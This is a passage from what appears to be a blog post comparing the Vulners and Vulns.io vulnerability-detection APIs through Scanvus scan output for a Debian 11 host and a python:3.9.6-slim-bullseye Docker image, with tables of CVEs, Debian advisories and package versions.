+---+----------+-------------+------------------+----------------------------------------------------------------+\n | 3 | High | DSA-5207-1 | CVE-2022-26373 | linux-image-5.10.0-16-amd64-5.10.127-2.amd64 < 0:5.10.136-1 |\n | | | | CVE-2022-2585 | |\n | | | | CVE-2022-23816 | |\n | | | | CVE-2022-2588 | |\n | | | | CVE-2022-29901 | |\n | | | | CVE-2022-36946 | |\n | | | | CVE-2022-2586 | |\n | | | | CVE-2022-29900 | |\n | | | | CVE-2022-36879 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 4 | High | DSA-5235-1 | CVE-2022-3080 | bind9-dnsutils-1:9.16.27-1~deb11u1.amd64 < 1:9.16.33-1~deb11u1 |\n | | | | CVE-2022-38177 | bind9-host-1:9.16.27-1~deb11u1.amd64 < 1:9.16.33-1~deb11u1 |\n | | | | CVE-2022-2795 | 
bind9-libs-1:9.16.27-1~deb11u1.amd64 < 1:9.16.33-1~deb11u1 |\n | | | | CVE-2022-38178 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 5 | High | no advisory | CVE-2022-1616 | bash-completion-1:2.11-2.all >= 0:0.0.0 |\n | | | | CVE-2022-31782 | bluetooth-5.55-3.1.all >= 0:0.0.0 |\n | | | | CVE-2022-0361 | bluez-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-15778 | libbluetooth3-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3534 | busybox-1:1.30.1-6+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-28831 | cpio-2.13+dfsg-4.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-43680 | dnsmasq-base-2.85-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-43551 | e2fsprogs-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0629 | libcom-err2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2284 | libext2fs2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4173 | libss2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0729 | logsave-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3999 | grub-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-2206 | grub-pc-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2021-3903 | grub-pc-bin-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-1733 | grub2-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-1851 | iptables-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-19378 | libip4tc2-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-9918 | libip6tc2-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42385 | libxtables12-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2581 | krb5-locales-1.18.3-6+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2021-42384 | libgssapi-krb5-2-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-39537 | libk5crypto3-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42919 | libkrb5-3-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3973 | libkrb5support0-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2129 | libbpf0-1:0.3-2.amd64 >= 0:0.0.0 |\n | | | | 
CVE-2021-4136 | libc-bin-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-15131 | libc-l10n-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2022-3176 | libc6-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2344 | locales-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2021-3697 | libcurl3-gnutls-7.74.0-1.3+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-7246 | libexpat1-2.2.10-2+deb11u3.amd64 < 0:2.2.10-2+deb11u5 |\n | | | | CVE-2020-26560 | libfreetype6-2.10.4+dfsg-1+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-26559 | libgcrypt20-1.8.7-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-39686 | libjansson4-2.13.1-1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1247 | libldap-2.4-2-2.4.57+dfsg-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42382 | libldap-common-2.4.57+dfsg-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2017-17740 | libncurses6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-36325 | libncursesw6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2257 | libtinfo6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1154 | ncurses-base-6.2+20201114-2.all >= 0:0.0.0 |\n | | | | CVE-2022-0392 | ncurses-bin-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3297 | ncurses-term-6.2+20201114-2.all >= 0:0.0.0 |\n | | | | CVE-2021-4192 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2287 | libperl5.32-5.32.1-4+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0408 | perl-5.32.1-4+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2571 | perl-base-5.32.1-4+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0393 | perl-modules-5.32-5.32.1-4+deb11u2.all >= 0:0.0.0 |\n | | | | CVE-2022-1619 | libpolkit-agent-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-7245 | libpolkit-gobject-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2345 | policykit-1-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1886 | libpython3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4204 | libpython3.9-stdlib-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | 
CVE-2022-0943 | python3.9-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2264 | python3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0359 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0572 | linux-image-5.10.0-16-amd64-5.10.127-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0391 | linux-image-5.10.0-17-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-11164 | linux-image-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0413 | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3974 | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1769 | openssh-client-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42378 | openssh-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0554 | openssh-sftp-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2175 | python3-httplib2-0.18.1-3.all >= 0:0.0.0 |\n | | | | CVE-2022-0685 | vim-common-2:8.2.2434-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2022-1621 | vim-tiny-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-36690 | xxd-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010023 | xdg-user-dirs-0.17-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2946 | |\n | | | | CVE-2018-20796 | |\n | | | | CVE-2021-38185 | |\n | | | | CVE-2018-6829 | |\n | | | | CVE-2022-3424 | |\n | | | | CVE-2021-21240 | |\n | | | | CVE-2022-1735 | |\n | | | | CVE-2022-0204 | |\n | | | | CVE-2019-9192 | |\n | | | | CVE-2016-9917 | |\n | | | | CVE-2022-2849 | |\n | | | | CVE-2022-2304 | |\n | | | | CVE-2022-0407 | |\n | | | | CVE-2021-3737 | |\n | | | | CVE-2022-2602 | |\n | | | | CVE-2022-1898 | |\n | | | | CVE-2022-2845 | |\n | | | | CVE-2022-0417 | |\n | | | | CVE-2022-1882 | |\n | | | | CVE-2013-7445 | |\n | | | | CVE-2019-20838 | |\n | | | | CVE-2021-42386 | |\n | | | | CVE-2022-2289 | |\n | | | | CVE-2022-1304 | |\n | | | | CVE-2022-2889 | |\n | | | | CVE-2022-1629 | |\n | | | | CVE-2021-41617 | |\n | | | | CVE-2022-2183 | |\n | | | | CVE-2022-0351 | |\n | | | | CVE-2020-11725 
| |\n | | | | CVE-2021-4166 | |\n | | | | CVE-2022-2817 | |\n | | | | CVE-2020-26557 | |\n | | | | CVE-2022-29458 | |\n | | | | CVE-2021-3968 | |\n | | | | CVE-2022-25265 | |\n | | | | CVE-2019-19070 | |\n | | | | CVE-2021-4037 | |\n | | | | CVE-2019-12456 | |\n | | | | CVE-2019-19882 | |\n | | | | CVE-2021-33560 | |\n | | | | CVE-2022-2522 | |\n | | | | CVE-2022-2182 | |\n | | | | CVE-2012-2663 | |\n | | | | CVE-2022-1796 | |\n | | | | CVE-2022-2862 | |\n | | | | CVE-2022-2286 | |\n | | | | CVE-2020-16156 | |\n | | | | CVE-2022-1942 | |\n | | | | CVE-2022-1679 | |\n | | | | CVE-2021-26934 | |\n | | | | CVE-2018-1000500 | |\n | | | | CVE-2008-4609 | |\n | | | | CVE-2019-19449 | |\n | | | | CVE-2021-42381 | |\n | | | | CVE-2022-0368 | |\n | | | | CVE-2022-1720 | |\n | | | | CVE-2022-2125 | |\n | | | | CVE-2021-3847 | |\n | | | | CVE-2022-4139 | |\n | | | | CVE-2022-4378 | |\n | | | | CVE-2022-1620 | |\n | | | | CVE-2021-3872 | |\n | | | | CVE-2022-2126 | |\n | | | | CVE-2022-0934 | |\n | | | | CVE-2021-3928 | |\n | | | | CVE-2022-2000 | |\n | | | | CVE-2021-42383 | |\n | | | | CVE-2022-2816 | |\n | | | | CVE-2021-3984 | |\n | | | | CVE-2019-19814 | |\n | | | | CVE-2022-28733 | |\n | | | | CVE-2021-3927 | |\n | | | | CVE-2020-12362 | |\n | | | | CVE-2018-5709 | |\n | | | | CVE-2011-4116 | |\n | | | | CVE-2022-35737 | |\n | | | | CVE-2022-30065 | |\n | | | | CVE-2022-28734 | |\n | | | | CVE-2018-7738 | |\n | | | | CVE-2021-4187 | |\n | | | | CVE-2021-4069 | |\n | | | | CVE-2016-2568 | |\n | | | | CVE-2022-2343 | |\n | | | | CVE-2021-32078 | |\n | | | | CVE-2021-28861 | |\n | | | | CVE-2021-42380 | |\n | | | | CVE-2022-2819 | |\n | | | | CVE-2022-1785 | |\n | | | | CVE-2021-3864 | |\n | | | | CVE-2022-0443 | |\n | | | | CVE-2022-2124 | |\n | | | | CVE-2021-4019 | |\n | | | | CVE-2022-1968 | |\n | | | | CVE-2022-28391 | |\n | | | | CVE-2022-0500 | |\n | | | | CVE-2022-3775 | |\n | | | | CVE-2022-1897 | |\n | | | | CVE-2022-0261 | |\n | | | | CVE-2021-42379 | |\n | | | | 
CVE-2022-2285 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 6 | Medium | DSA-5251-1 | CVE-2022-2929 | isc-dhcp-client-4.4.1-2.3.amd64 < 0:4.4.1-2.3+deb11u1 |\n | | | | CVE-2022-2928 | isc-dhcp-common-4.4.1-2.3.amd64 < 0:4.4.1-2.3+deb11u1 |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 7 | Medium | no advisory | CVE-2019-12380 | avahi-autoipd-0.8-5.amd64 < 0:0.8-5+deb11u1 |\n | | | | CVE-2021-42376 | bash-5.1-2+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-16234 | bluetooth-5.55-3.1.all >= 0:0.0.0 |\n | | | | CVE-2022-3586 | bluez-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-5367 | libbluetooth3-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1674 | bsdextrautils-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-31879 | bsdutils-1:2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-15919 | eject-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1771 | fdisk-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-36516 | libblkid1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1280 | libfdisk1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3669 | libmount1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-5321 | libsmartcols1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2007-6755 | libuuid1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-15719 | mount-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42374 | util-linux-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-28736 | busybox-1:1.30.1-6+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-9804 | coreutils-8.32-4+b1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42375 | grub-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2021-3696 | grub-pc-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2018-17977 | grub-pc-bin-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-0156 | grub2-common-2.04-20.amd64 < 
0:2.06-3~deb11u1 |\n | | | | CVE-2022-3542 | initramfs-tools-0.140.all >= 0:0.0.0 |\n | | | | CVE-2016-9799 | initramfs-tools-core-0.140.all >= 0:0.0.0 |\n | | | | CVE-2011-3389 | krb5-locales-1.18.3-6+deb11u1.all < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2020-26555 | libgssapi-krb5-2-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2019-16229 | libk5crypto3-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2020-24504 | libkrb5-3-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2017-16231 | libkrb5support0-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2021-4193 | libbpf0-1:0.3-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2874 | libc-bin-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2012-4542 | libc-l10n-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2022-3715 | libc6-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2013-4235 | locales-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2016-9798 | libcurl3-gnutls-7.74.0-1.3+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-0347 | libexpat1-2.2.10-2+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-22923 | libglib2.0-0-2.66.8-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-14159 | libglib2.0-data-2.66.8-1.all >= 0:0.0.0 |\n | | | | CVE-2021-3468 | libgnutls30-3.7.1-5+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-5366 | libldap-2.4-2-2.4.57+dfsg-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2012-0039 | libldap-common-2.4.57+dfsg-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2020-14145 | libnss-systemd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-18018 | libpam-systemd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-4415 | libsystemd0-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-44879 | libudev1-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3502 | systemd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-4095 | systemd-sysv-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1420 | systemd-timesyncd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-3709 | udev-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-15794 | 
libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0213 | libpng16-16-1.6.37-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42328 | libpolkit-agent-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42329 | libpolkit-gobject-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42898 | policykit-1-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2015-3276 | libprotobuf-c1-1.3.3-1+b2.amd64 >= 0:0.0.0 |\n | | | | CVE-2011-4917 | libpython3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-4756 | libpython3.9-stdlib-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4189 | python3.9-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-16233 | python3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2231 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4214 | libssl1.1-1.1.1n-0+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2014-9892 | openssl-1.1.1n-0+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-4677 | libxml2-2.9.10+dfsg-6.7+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-4996 | linux-image-5.10.0-16-amd64-5.10.127-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-12364 | linux-image-5.10.0-17-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2598 | linux-image-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-1000382 | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3426 | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-0928 | openssh-client-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2097 | openssh-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-13084 | openssh-sftp-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-5135 | os-prober-1.79.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-9803 | ppp-2.4.9-1+1.amd64 >= 0:0.0.0 |\n | | | | CVE-2015-3243 | rsyslog-8.2102.0-2+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-0630 | vim-common-2:8.2.2434-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2007-2768 | vim-tiny-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45941 | xxd-2:8.2.2434-3+deb11u1.amd64 >= 
0:0.0.0 |\n | | | | CVE-2016-10723 | wget-1.21-1+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3857 | wpasupplicant-2:2.9.0-21.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3658 | |\n | | | | CVE-2020-26142 | |\n | | | | CVE-2022-2208 | |\n | | | | CVE-2022-2873 | |\n | | | | CVE-2021-45346 | |\n | | | | CVE-2022-4662 | |\n | | | | CVE-2022-0714 | |\n | | | | CVE-2021-4023 | |\n | | | | CVE-2007-5686 | |\n | | | | CVE-2019-6129 | |\n | | | | CVE-2022-3061 | |\n | | | | CVE-2022-0171 | |\n | | | | CVE-2020-12363 | |\n | | | | CVE-2022-33070 | |\n | | | | CVE-2017-13694 | |\n | | | | CVE-2021-3714 | |\n | | | | CVE-2022-1184 | |\n | | | | CVE-2020-26143 | |\n | | | | CVE-2019-1010025 | |\n | | | | CVE-2020-13529 | |\n | | | | CVE-2019-16089 | |\n | | | | CVE-2022-0563 | |\n | | | | CVE-2019-15213 | |\n | | | | CVE-2019-12379 | |\n | | | | CVE-2014-9900 | |\n | | | | CVE-2022-2923 | |\n | | | | CVE-2019-5062 | |\n | | | | CVE-2021-30004 | |\n | | | | CVE-2016-9797 | |\n | | | | CVE-2016-9801 | |\n | | | | CVE-2017-13693 | |\n | | | | CVE-2007-2243 | |\n | | | | CVE-2019-6110 | |\n | | | | CVE-2022-0696 | |\n | | | | CVE-2019-12381 | |\n | | | | CVE-2021-4115 | |\n | | | | CVE-2019-16231 | |\n | | | | CVE-2019-12382 | |\n | | | | CVE-2022-3344 | |\n | | | | CVE-2020-14304 | |\n | | | | CVE-2022-23825 | |\n | | | | CVE-2019-12455 | |\n | | | | CVE-2004-0230 | |\n | | | | CVE-2022-3707 | |\n | | | | CVE-2019-16230 | |\n | | | | CVE-2019-1010024 | |\n | | | | CVE-2020-26140 | |\n | | | | CVE-2016-20012 | |\n | | | | CVE-2021-22922 | |\n | | | | CVE-2021-3759 | |\n | | | | CVE-2022-0480 | |\n | | | | CVE-2011-4916 | |\n | | | | CVE-2005-3660 | |\n | | | | CVE-2010-4563 | |\n | | | | CVE-2016-8660 | |\n | | | | CVE-2008-3234 | |\n | | | | CVE-2013-0340 | |\n | | | | CVE-2019-20794 | |\n | | | | CVE-2016-2781 | |\n | | | | CVE-2019-16232 | |\n | | | | CVE-2021-33061 | |\n | | | | CVE-2022-3628 | |\n | | | | CVE-2018-12928 | |\n | | | | CVE-2022-28735 | |\n | | | | CVE-2018-1121 | 
|\n | | | | CVE-2022-1462 | |\n | | | | CVE-2022-43552 | |\n | | | | CVE-2016-9800 | |\n | | | | CVE-2019-12378 | |\n | | | | CVE-2021-4149 | |\n | | | | CVE-2011-4915 | |\n | | | | CVE-2020-15802 | |\n | | | | CVE-2021-45940 | |\n | | | | CVE-2022-2153 | |\n | | | | CVE-2022-4543 | |\n | | | | CVE-2021-41229 | |\n | | | | CVE-2008-2544 | |\n | | | | CVE-2016-9802 | |\n | | | | CVE-2022-3606 | |\n | | | | CVE-2022-0400 | |\n | | | | CVE-2022-0319 | |\n | | | | CVE-2022-21505 | |\n | | | | CVE-2021-3733 | |\n | | | | CVE-2021-42373 | |\n | | | | CVE-2021-3695 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n \n\nAnd we can see that the APIs returned different detection results for the DSA/DLA bulletins. The intersection of the sets is empty.\n \n \n **Vulners \u2216 VulnsIO:** 3 {'DLA-3206-1', 'DSA-5287-1', 'DLA-3152-1'}\n **Vulners \u2229 VulnsIO:** 0 set()\n **VulnsIO \u2216 Vulners:** 4 {'DSA-5207-1', 'DSA-5235-1', 'DSA-5236-1', 'DSA-5251-1'}\n\nAt the same time, proofs look convincing at first glance. In this episode, I won't go into why there is such a difference in Debian vulnerability detection results. Perhaps the answer is in the operation of the API, and perhaps in the collection of data from the host. I think we will solve this with colleagues from Vulners and Vulns.io. I'm just pointing out again that vulnerability detection is not that easy and it's good when you can use several independent detection engines and compare the results.\n\n### Docker image \n\nNext, I check the vulnerabilities for the Docker image. 
It is also based on Debian 11.\n \n \n $ python3.8 scanvus.py --audit-service vulners --assessment-type \"docker_image\" --docker-image \"python:3.9.6-slim-bullseye\"\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: docker_image\n docker_image: python:3.9.6-slim-bullseye\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 105\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for python:3.9.6-slim-bullseye (docker_image, debian 11, linux kernel 5.4.0-135-generic, 105 packages)\n 22 vulnerabilities with levels ['Critical', 'High', 'Medium'] were found\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 1 | Critical | DEBIAN:DLA-2904-1:6B1FD | CVE-2021-45960 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u1 |\n | | | | CVE-2021-46143 | |\n | | | | CVE-2022-22822 | |\n | | | | CVE-2022-22823 | |\n | | | | CVE-2022-22824 | |\n | | | | CVE-2022-22825 | |\n | | | | CVE-2022-22826 | |\n | | | | CVE-2022-22827 | |\n | | | | CVE-2022-23852 | |\n | | | | CVE-2022-23990 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 2 | Critical | DEBIAN:DLA-3008-1:E2717 | CVE-2022-1292 | libssl1.1 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n 
+----+----------+-------------------------+----------------+----------------------------------------------------+\n | 3 | Critical | DEBIAN:DSA-5073-1:5DBA9 | CVE-2021-45960 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u1 |\n | | | | CVE-2021-46143 | |\n | | | | CVE-2022-22822 | |\n | | | | CVE-2022-22823 | |\n | | | | CVE-2022-22824 | |\n | | | | CVE-2022-22825 | |\n | | | | CVE-2022-22826 | |\n | | | | CVE-2022-22827 | |\n | | | | CVE-2022-23852 | |\n | | | | CVE-2022-23990 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 4 | Critical | DEBIAN:DSA-5139-1:0E208 | CVE-2022-1292 | libssl1.1 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 5 | Critical | DEBIAN:DSA-5169-1:87483 | CVE-2022-2068 | libssl1.1 1.1.1k-1 amd64 < 1.1.1n-0+deb11u3 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1n-0+deb11u3 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 6 | High | DEBIAN:DLA-2935-1:EEAAD | CVE-2022-23852 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u1 |\n | | | | CVE-2022-25235 | |\n | | | | CVE-2022-25236 | |\n | | | | CVE-2022-25313 | |\n | | | | CVE-2022-25315 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 7 | High | DEBIAN:DLA-3022-1:26EFE | CVE-2022-1664 | dpkg 1.20.9 amd64 < 1.20.10 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 8 | High | DEBIAN:DLA-3152-1:9B676 | CVE-2016-10228 | libc-bin 2.31-13 amd64 < 2.31-13+deb11u3 |\n | | | | CVE-2019-19126 | libc6 2.31-13 amd64 < 2.31-13+deb11u3 |\n | | | | CVE-2019-25013 | |\n | | | | CVE-2020-10029 | |\n | | | | CVE-2020-1752 | |\n | | | | CVE-2020-27618 | |\n | | | | 
CVE-2020-6096 | |\n | | | | CVE-2021-27645 | |\n | | | | CVE-2021-3326 | |\n | | | | CVE-2021-33574 | |\n | | | | CVE-2021-35942 | |\n | | | | CVE-2021-3999 | |\n | | | | CVE-2022-23218 | |\n | | | | CVE-2022-23219 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 9 | High | DEBIAN:DSA-4963-1:90BFC | CVE-2021-3711 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | CVE-2021-3712 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 10 | High | DEBIAN:DSA-4963-1:DA7BC | CVE-2021-3711 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | CVE-2021-3712 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 11 | High | DEBIAN:DSA-5085-1:EC5E7 | CVE-2022-25235 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u2 |\n | | | | CVE-2022-25236 | |\n | | | | CVE-2022-25313 | |\n | | | | CVE-2022-25314 | |\n | | | | CVE-2022-25315 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 12 | High | DEBIAN:DSA-5085-2:292DA | CVE-2022-25236 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u3 |\n 